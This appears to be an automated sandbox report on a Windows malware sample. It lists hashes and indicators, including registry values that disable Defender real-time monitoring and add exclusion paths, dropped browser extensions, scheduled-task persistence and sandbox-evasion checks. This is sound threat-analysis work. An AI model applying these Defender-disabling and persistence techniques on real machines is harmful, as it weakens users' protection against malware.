Analysis
-
max time kernel
224s -
max time network
230s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
30-10-2023 03:45
Static task
static1
Behavioral task
behavioral1
Sample
992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe
Resource
win7-20231023-en
General
-
Target
992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe
-
Size
7.3MB
-
MD5
704b4f4e101ed35a3735ab0b586859ad
-
SHA1
db554d46b64cfa45e057d9bb355b2ed610c79001
-
SHA256
992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b
-
SHA512
7b8e7291ccb8e2eb7d88d09c906a032956a5ba93a5cc6da744c3425f2534a09d2dd3b69818e58eefc4e2f06768034286e8051d5ccd71fcc6842bb8a45dcb597a
-
SSDEEP
196608:91Oe+bSAdYjIvc4Ch8eyBoSSAVxiNhdQdmv:3OUAS05BnSUIN8dM
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VgjyoxcUurXmC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VgjyoxcUurXmC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JiflobLJSPStBDVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UbaivrmHqZUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IUaOUdhiTQgU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JiflobLJSPStBDVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IUaOUdhiTQgU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TNrIrJXzU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TNrIrJXzU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UbaivrmHqZUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\eogxozCJrYNgvSKM = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 776 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Control Panel\International\Geo\Nation ihlHohq.exe -
Executes dropped EXE 4 IoCs
pid Process 1752 Install.exe 2680 Install.exe 776 nOIexXf.exe 1240 ihlHohq.exe -
Loads dropped DLL 12 IoCs
pid Process 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 1752 Install.exe 1752 Install.exe 1752 Install.exe 1752 Install.exe 2680 Install.exe 2680 Install.exe 2680 Install.exe 776 rundll32.exe 776 rundll32.exe 776 rundll32.exe 776 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ihlHohq.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ihlHohq.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_90E6705D31DA2761A44BA5F5F40B2AEC ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_90E6705D31DA2761A44BA5F5F40B2AEC ihlHohq.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nOIexXf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_B67A81AFAE089B928194572649A22563 ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol nOIexXf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini nOIexXf.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E83F1CC07F729E027C8598AD1DA25FD6 ihlHohq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_B67A81AFAE089B928194572649A22563 ihlHohq.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E83F1CC07F729E027C8598AD1DA25FD6 ihlHohq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ihlHohq.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\TNrIrJXzU\PDbNsDW.xml ihlHohq.exe File created C:\Program Files (x86)\VgjyoxcUurXmC\TPUzYEj.dll ihlHohq.exe File created C:\Program Files (x86)\VgjyoxcUurXmC\MInXURM.xml ihlHohq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ihlHohq.exe File created C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR\sDuKbad.dll ihlHohq.exe File created C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR\UnKuZpK.xml ihlHohq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ihlHohq.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ihlHohq.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ihlHohq.exe File created C:\Program Files (x86)\IUaOUdhiTQgU2\iFNdmmj.xml ihlHohq.exe File created C:\Program Files (x86)\TNrIrJXzU\jcdKGA.dll ihlHohq.exe File created C:\Program Files (x86)\UbaivrmHqZUn\BLocupU.dll ihlHohq.exe File created C:\Program Files (x86)\IUaOUdhiTQgU2\TjWcMdYKjGvAK.dll ihlHohq.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bioYAMjDPNiNoqxvcS.job schtasks.exe File created C:\Windows\Tasks\YjdyicABEfUJyYqxF.job schtasks.exe File created C:\Windows\Tasks\RkwdBuXRacmpEbY.job schtasks.exe File created C:\Windows\Tasks\aaSAiCeWTOJWAqakW.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2524 schtasks.exe 1200 schtasks.exe 944 schtasks.exe 1940 schtasks.exe 2792 schtasks.exe 1332 schtasks.exe 2000 schtasks.exe 2644 schtasks.exe 2024 schtasks.exe 1896 schtasks.exe 2180 schtasks.exe 1920 schtasks.exe 1764 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4e-bd-81-05-8a-01 ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4806B338-2D1A-455C-A565-538801EDA3BF}\4e-bd-81-05-8a-01 ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs ihlHohq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ihlHohq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections ihlHohq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4e-bd-81-05-8a-01\WpadDecisionReason = "1" ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs ihlHohq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4e-bd-81-05-8a-01\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ihlHohq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4806B338-2D1A-455C-A565-538801EDA3BF}\WpadDecisionReason = "1" ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ihlHohq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4806B338-2D1A-455C-A565-538801EDA3BF}\WpadNetworkName = "Network 3" ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs ihlHohq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4e-bd-81-05-8a-01\WpadDecisionTime = 80fe9304e40ada01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs ihlHohq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ihlHohq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA ihlHohq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople ihlHohq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4806B338-2D1A-455C-A565-538801EDA3BF}\WpadDecisionTime = 80fe9304e40ada01 ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ihlHohq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4e-bd-81-05-8a-01\WpadDecisionTime = 80fe9304e40ada01 ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates ihlHohq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4806B338-2D1A-455C-A565-538801EDA3BF}\4e-bd-81-05-8a-01 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates ihlHohq.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4e-bd-81-05-8a-01\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4e-bd-81-05-8a-01\WpadDecision = "0" ihlHohq.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2476 powershell.EXE 2476 powershell.EXE 2476 powershell.EXE 2588 powershell.EXE 2588 powershell.EXE 2588 powershell.EXE 388 powershell.EXE 388 powershell.EXE 388 powershell.EXE 1788 powershell.EXE 1788 powershell.EXE 1788 powershell.EXE 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe 1240 ihlHohq.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2476 powershell.EXE Token: SeDebugPrivilege 2588 powershell.EXE Token: SeDebugPrivilege 388 powershell.EXE Token: SeDebugPrivilege 1788 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3036 wrote to memory of 1752 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 3036 wrote to memory of 1752 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 3036 wrote to memory of 1752 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 3036 wrote to memory of 1752 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 3036 wrote to memory of 1752 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 3036 wrote to memory of 1752 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 3036 wrote to memory of 1752 3036 992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe 28 PID 1752 wrote to memory of 2680 1752 Install.exe 29 PID 1752 wrote to memory of 2680 1752 Install.exe 29 PID 1752 wrote to memory of 2680 1752 Install.exe 29 PID 1752 wrote to memory of 2680 1752 Install.exe 29 PID 1752 wrote to memory of 2680 1752 Install.exe 29 PID 1752 wrote to memory of 2680 1752 Install.exe 29 PID 1752 wrote to memory of 2680 1752 Install.exe 29 PID 2680 wrote to memory of 2608 2680 Install.exe 31 PID 2680 wrote to memory of 2608 2680 Install.exe 31 PID 2680 wrote to memory of 2608 2680 Install.exe 31 PID 2680 wrote to memory of 2608 2680 Install.exe 31 PID 2680 wrote to memory of 2608 2680 Install.exe 31 PID 2680 wrote to memory of 2608 2680 Install.exe 31 PID 2680 wrote to memory of 2608 2680 Install.exe 31 PID 2680 wrote to memory of 2784 2680 Install.exe 33 PID 2680 wrote to memory of 2784 2680 Install.exe 33 PID 2680 wrote to memory of 2784 2680 Install.exe 33 PID 2680 wrote to memory of 2784 2680 Install.exe 33 PID 2680 wrote to memory of 2784 2680 Install.exe 33 PID 2680 wrote to memory of 2784 2680 Install.exe 33 PID 2680 wrote to memory of 2784 2680 Install.exe 33 PID 2608 wrote to memory of 2672 2608 forfiles.exe 35 PID 2608 wrote to memory of 2672 2608 forfiles.exe 35 PID 2608 wrote to memory of 2672 2608 forfiles.exe 35 PID 2608 wrote to memory of 2672 2608 forfiles.exe 35 PID 2608 wrote to memory of 2672 2608 forfiles.exe 35 PID 2608 wrote to memory of 2672 2608 forfiles.exe 35 PID 2608 wrote to memory of 2672 2608 forfiles.exe 35 PID 2784 wrote to memory of 3040 2784 forfiles.exe 36 PID 2784 wrote to memory of 3040 2784 forfiles.exe 36 PID 2784 wrote to memory of 3040 2784 forfiles.exe 36 PID 2784 wrote to memory of 3040 2784 forfiles.exe 36 PID 2784 wrote to memory of 3040 2784 forfiles.exe 36 PID 2784 wrote to memory of 3040 2784 forfiles.exe 36 PID 2784 wrote to memory of 3040 2784 forfiles.exe 36 PID 2672 wrote to memory of 2628 2672 cmd.exe 37 PID 2672 wrote to memory of 2628 2672 cmd.exe 37 PID 2672 wrote to memory of 2628 2672 cmd.exe 37 PID 2672 wrote to memory of 2628 2672 cmd.exe 37 PID 2672 wrote to memory of 2628 2672 cmd.exe 37 PID 2672 wrote to memory of 2628 2672 cmd.exe 37 PID 2672 wrote to memory of 2628 2672 cmd.exe 37 PID 3040 wrote to memory of 2656 3040 cmd.exe 38 PID 3040 wrote to memory of 2656 3040 cmd.exe 38 PID 3040 wrote to memory of 2656 3040 cmd.exe 38 PID 3040 wrote to memory of 2656 3040 cmd.exe 38 